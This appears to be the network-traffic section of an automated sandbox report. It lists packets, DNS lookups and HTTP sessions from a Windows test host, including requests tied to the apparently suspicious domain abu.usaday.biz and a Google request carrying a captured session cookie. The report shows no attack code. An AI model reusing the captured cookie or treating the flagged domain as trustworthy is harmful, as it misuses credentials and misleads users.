                      Oct 10, 2023 05:16:28.984337091 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:28.984391928 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:28.987073898 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:29.031547070 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:29.040139914 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:29.064541101 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:29.064591885 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:29.064646959 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:29.064668894 CEST49709443192.168.2.3104.98.116.138
                      Oct 10, 2023 05:16:29.086481094 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:29.227343082 CEST44349709104.98.116.138192.168.2.3
                      Oct 10, 2023 05:16:29.710170984 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:29.710225105 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:29.710244894 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:29.710261106 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:29.710297108 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:29.710318089 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:29.710336924 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:29.710342884 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:29.710366964 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:29.710369110 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:29.710386992 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:29.710414886 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:29.710542917 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:29.710624933 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:29.710635900 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:29.710736036 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:29.710797071 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:30.203058004 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:30.203079939 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:30.203121901 CEST49721443192.168.2.340.68.123.157
                      Oct 10, 2023 05:16:30.203125954 CEST4434972140.68.123.157192.168.2.3
                      Oct 10, 2023 05:16:57.994929075 CEST49707443192.168.2.323.65.35.190
                      Oct 10, 2023 05:16:57.994946957 CEST4970880192.168.2.323.64.190.239
                      Oct 10, 2023 05:16:58.158081055 CEST4434970723.65.35.190192.168.2.3
                      Oct 10, 2023 05:16:58.158195972 CEST4434970723.65.35.190192.168.2.3
                      Oct 10, 2023 05:16:58.158382893 CEST49707443192.168.2.323.65.35.190
                      Oct 10, 2023 05:16:58.158394098 CEST804970823.64.190.239192.168.2.3
                      Oct 10, 2023 05:16:58.158433914 CEST49707443192.168.2.323.65.35.190
                      Oct 10, 2023 05:16:58.158478975 CEST4970880192.168.2.323.64.190.239
                      Oct 10, 2023 05:17:07.248732090 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:07.248811960 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:07.248891115 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:07.249648094 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:07.249680042 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:08.177505970 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:08.177669048 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:08.182224035 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:08.182246923 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:08.182662964 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:08.184911013 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:08.226480007 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:09.100327969 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:09.100389004 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:09.100429058 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:09.100663900 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:09.100745916 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:09.100788116 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:09.101039886 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:09.104595900 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:09.104635954 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:09.104654074 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:09.104662895 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:15.251873016 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:15.251940012 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:15.252029896 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:15.252701998 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:15.252722025 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:15.614530087 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:15.615031004 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:15.615113974 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:15.615447998 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:15.615901947 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:15.616012096 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:15.665930033 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:25.606395006 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:25.606472969 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:25.606545925 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:27.042831898 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:27.042880058 CEST44349727172.217.12.132192.168.2.3
                      TimestampSource PortDest PortSource IPDest IP
                      Oct 10, 2023 05:16:10.844350100 CEST5129253192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:10.844708920 CEST5074653192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:10.845242977 CEST6134553192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:10.845524073 CEST5615653192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:10.999979019 CEST53631661.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:11.008119106 CEST53507461.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:11.008163929 CEST53512921.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:11.008177042 CEST53613451.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:11.008842945 CEST53561561.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:11.977457047 CEST53572091.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:12.307085991 CEST6120353192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:12.307429075 CEST5525753192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:12.476754904 CEST53612031.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:12.477375984 CEST53552571.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:12.482376099 CEST5898053192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:12.482548952 CEST5150353192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:12.651099920 CEST53515031.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:12.652868986 CEST53589801.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:14.176481962 CEST5245653192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:14.176950932 CEST6074853192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:14.340353012 CEST53524561.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:14.340567112 CEST53607481.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:15.101687908 CEST6054453192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:15.101965904 CEST5938553192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:15.265678883 CEST53605441.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:15.266284943 CEST53593851.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:30.302982092 CEST53541281.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:49.236227036 CEST53627691.1.1.1192.168.2.3
                      Oct 10, 2023 05:17:10.498723030 CEST53624811.1.1.1192.168.2.3
                      Oct 10, 2023 05:17:11.783973932 CEST138138192.168.2.3192.168.2.255
                      Oct 10, 2023 05:17:12.820024967 CEST53556051.1.1.1192.168.2.3
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Oct 10, 2023 05:16:10.844350100 CEST192.168.2.31.1.1.10x6964Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:10.844708920 CEST192.168.2.31.1.1.10x749fStandard query (0)clients2.google.com65IN (0x0001)false
                      Oct 10, 2023 05:16:10.845242977 CEST192.168.2.31.1.1.10x5675Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:10.845524073 CEST192.168.2.31.1.1.10xef65Standard query (0)accounts.google.com65IN (0x0001)false
                      Oct 10, 2023 05:16:12.307085991 CEST192.168.2.31.1.1.10xee51Standard query (0)abu.usaday.bizA (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:12.307429075 CEST192.168.2.31.1.1.10x3642Standard query (0)abu.usaday.biz65IN (0x0001)false
                      Oct 10, 2023 05:16:12.482376099 CEST192.168.2.31.1.1.10x8ee5Standard query (0)abu.usaday.bizA (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:12.482548952 CEST192.168.2.31.1.1.10xc604Standard query (0)abu.usaday.biz65IN (0x0001)false
                      Oct 10, 2023 05:16:14.176481962 CEST192.168.2.31.1.1.10xa803Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:14.176950932 CEST192.168.2.31.1.1.10x744bStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                      Oct 10, 2023 05:16:15.101687908 CEST192.168.2.31.1.1.10x1029Standard query (0)www.google.comA (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:15.101965904 CEST192.168.2.31.1.1.10x274eStandard query (0)www.google.com65IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Oct 10, 2023 05:16:04.087738991 CEST1.1.1.1192.168.2.30x8649No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                      Oct 10, 2023 05:16:04.087738991 CEST1.1.1.1192.168.2.30x8649No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:11.008119106 CEST1.1.1.1192.168.2.30x749fNo error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                      Oct 10, 2023 05:16:11.008163929 CEST1.1.1.1192.168.2.30x6964No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                      Oct 10, 2023 05:16:11.008163929 CEST1.1.1.1192.168.2.30x6964No error (0)clients.l.google.com142.250.72.174A (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:11.008177042 CEST1.1.1.1192.168.2.30x5675No error (0)accounts.google.com142.250.217.141A (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:12.476754904 CEST1.1.1.1192.168.2.30xee51No error (0)abu.usaday.biz172.67.148.211A (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:12.476754904 CEST1.1.1.1192.168.2.30xee51No error (0)abu.usaday.biz104.21.63.171A (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:12.477375984 CEST1.1.1.1192.168.2.30x3642No error (0)abu.usaday.biz65IN (0x0001)false
                      Oct 10, 2023 05:16:12.651099920 CEST1.1.1.1192.168.2.30xc604No error (0)abu.usaday.biz65IN (0x0001)false
                      Oct 10, 2023 05:16:12.652868986 CEST1.1.1.1192.168.2.30x8ee5No error (0)abu.usaday.biz172.67.148.211A (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:12.652868986 CEST1.1.1.1192.168.2.30x8ee5No error (0)abu.usaday.biz104.21.63.171A (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:14.340353012 CEST1.1.1.1192.168.2.30xa803No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:15.265678883 CEST1.1.1.1192.168.2.30x1029No error (0)www.google.com172.217.12.132A (IP address)IN (0x0001)false
                      Oct 10, 2023 05:16:15.266284943 CEST1.1.1.1192.168.2.30x274eNo error (0)www.google.com65IN (0x0001)false
                      • clients2.google.com
                      • accounts.google.com
                      • abu.usaday.biz
                      • https:
                      • a.nel.cloudflare.com
                      • slscr.update.microsoft.com
                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                      Oct 10, 2023 05:16:28.437222004 CEST104.98.116.138443192.168.2.349709CN=r.bing.com, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft RSA TLS CA 01, O=Microsoft Corporation, C=USCN=Microsoft RSA TLS CA 01, O=Microsoft Corporation, C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Nov 15 21:16:38 CET 2022 Wed Jul 22 01:00:00 CEST 2020Wed Nov 15 21:16:38 CET 2023 Tue Oct 08 09:00:00 CEST 2024771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,028a2c9bd18a11de089ef85a160da29e4
                      CN=Microsoft RSA TLS CA 01, O=Microsoft Corporation, C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Jul 22 01:00:00 CEST 2020Tue Oct 08 09:00:00 CEST 2024
                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.349713142.250.72.174443C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-10 03:16:11 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.134&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                      Host: clients2.google.com
                      Connection: keep-alive
                      X-Goog-Update-Interactivity: fg
                      X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                      X-Goog-Update-Updater: chromecrx-117.0.5938.134
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.349714142.250.217.141443C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-10 03:16:11 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                      Host: accounts.google.com
                      Connection: keep-alive
                      Content-Length: 1
                      Origin: https://www.google.com
                      Content-Type: application/x-www-form-urlencoded
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: 1P_JAR=2023-10-05-14; NID=511=OL3WgnA24QwPfMpspsItpZ2c_g7YXAAMilzUqiZdxG8z8Ka1c00AfG24ctRwvhPMrHVqO7oNbKVSwiOA0g2EzuMjPJIvQtOS7zZy99O8OkMoKSMKDFs-L1TjxHc_KVN5KBVb4BTfsPAzvlWsn_iACmkP3ulD50w_qpZ6JVqkr7w
                      2023-10-10 03:16:11 UTC1OUTData Raw: 20
                      Data Ascii:


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      10192.168.2.34971935.190.80.1443C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-10 03:16:15 UTC11OUTPOST /report/v3?s=u9mxTix3ZJeEJl1m3ga2mkiabeNsZGF4WOpN8lPQs64Iu3E%2BSd%2BCKY9%2FChjT5hZ8PNITU8eUe2meCLRVub3mm%2BWJxmVUkgsGuKltOtOpbj9tUQdvM2x4uKtaOCrzYJRXwg%3D%3D HTTP/1.1
                      Host: a.nel.cloudflare.com
                      Connection: keep-alive
                      Content-Length: 438
                      Content-Type: application/reports+json
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2023-10-10 03:16:15 UTC11OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 31 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 61 62 75 2e 75 73 61 64 61 79 2e 62 69 7a 2f 6a 71 75 65 72 79 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 34 38 2e 32 31 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74
                      Data Ascii: [{"age":0,"body":{"elapsed_time":717,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://abu.usaday.biz/jquery-3.6.0.min.js","sampling_fraction":1.0,"server_ip":"172.67.148.211","status_code":404,"type":"http.error"},"type":"net


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1135.190.80.1443192.168.2.349719C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-10 03:16:15 UTC12INHTTP/1.1 200 OK
                      Content-Length: 0
                      date: Tue, 10 Oct 2023 03:16:15 GMT
                      Via: 1.1 google
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      12192.168.2.34972140.68.123.157443C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-10 03:16:29 UTC12OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.3448/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=kT2HDdY9UAm6etl&MD=MFs5p6DS HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                      Host: slscr.update.microsoft.com
                      2023-10-10 03:16:29 UTC12INHTTP/1.1 200 OK
                      Cache-Control: no-cache
                      Pragma: no-cache
                      Content-Type: application/octet-stream
                      Expires: -1
                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                      MS-CorrelationId: 81ff7709-d024-48c3-ac3e-d6455c2f19e5
                      MS-RequestId: b2184d49-70eb-4037-823e-7df8de3d9039
                      MS-CV: IOEbIvuiQUafp23L.0
                      X-Microsoft-SLSClientCache: 2880
                      Content-Disposition: attachment; filename=environment.cab
                      X-Content-Type-Options: nosniff
                      Date: Tue, 10 Oct 2023 03:16:29 GMT
                      Connection: close
                      Content-Length: 24490
                      2023-10-10 03:16:29 UTC13INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                      2023-10-10 03:16:29 UTC28INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      13192.168.2.34972240.127.169.103443C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-10 03:17:08 UTC36OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.3448/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=kT2HDdY9UAm6etl&MD=MFs5p6DS HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                      Host: slscr.update.microsoft.com
                      2023-10-10 03:17:09 UTC37INHTTP/1.1 200 OK
                      Cache-Control: no-cache
                      Pragma: no-cache
                      Content-Type: application/octet-stream
                      Expires: -1
                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                      ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                      MS-CorrelationId: a470e3d8-bdd4-41bf-aa05-642e6f96ac84
                      MS-RequestId: 9a27cbfa-5825-450a-804a-1fc8ae2b2f40
                      MS-CV: UvP0cYP2KU69dT3U.0
                      X-Microsoft-SLSClientCache: 2160
                      Content-Disposition: attachment; filename=environment.cab
                      X-Content-Type-Options: nosniff
                      Date: Tue, 10 Oct 2023 03:17:08 GMT
                      Connection: close
                      Content-Length: 25457
                      2023-10-10 03:17:09 UTC37INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                      Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                      2023-10-10 03:17:09 UTC53INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                      Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2142.250.72.174443192.168.2.349713C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-10 03:16:11 UTC1INHTTP/1.1 200 OK
                      Content-Security-Policy: script-src 'report-sample' 'nonce-FbHdtP7m_qw_z45hWPGXCA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 10 Oct 2023 03:16:11 GMT
                      Content-Type: text/xml; charset=UTF-8
                      X-Daynum: 6125
                      X-Daystart: 72971
                      X-Content-Type-Options: nosniff
                      X-Frame-Options: SAMEORIGIN
                      X-XSS-Protection: 1; mode=block
                      Server: GSE
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Accept-Ranges: none
                      Vary: Accept-Encoding
                      Connection: close
                      Transfer-Encoding: chunked
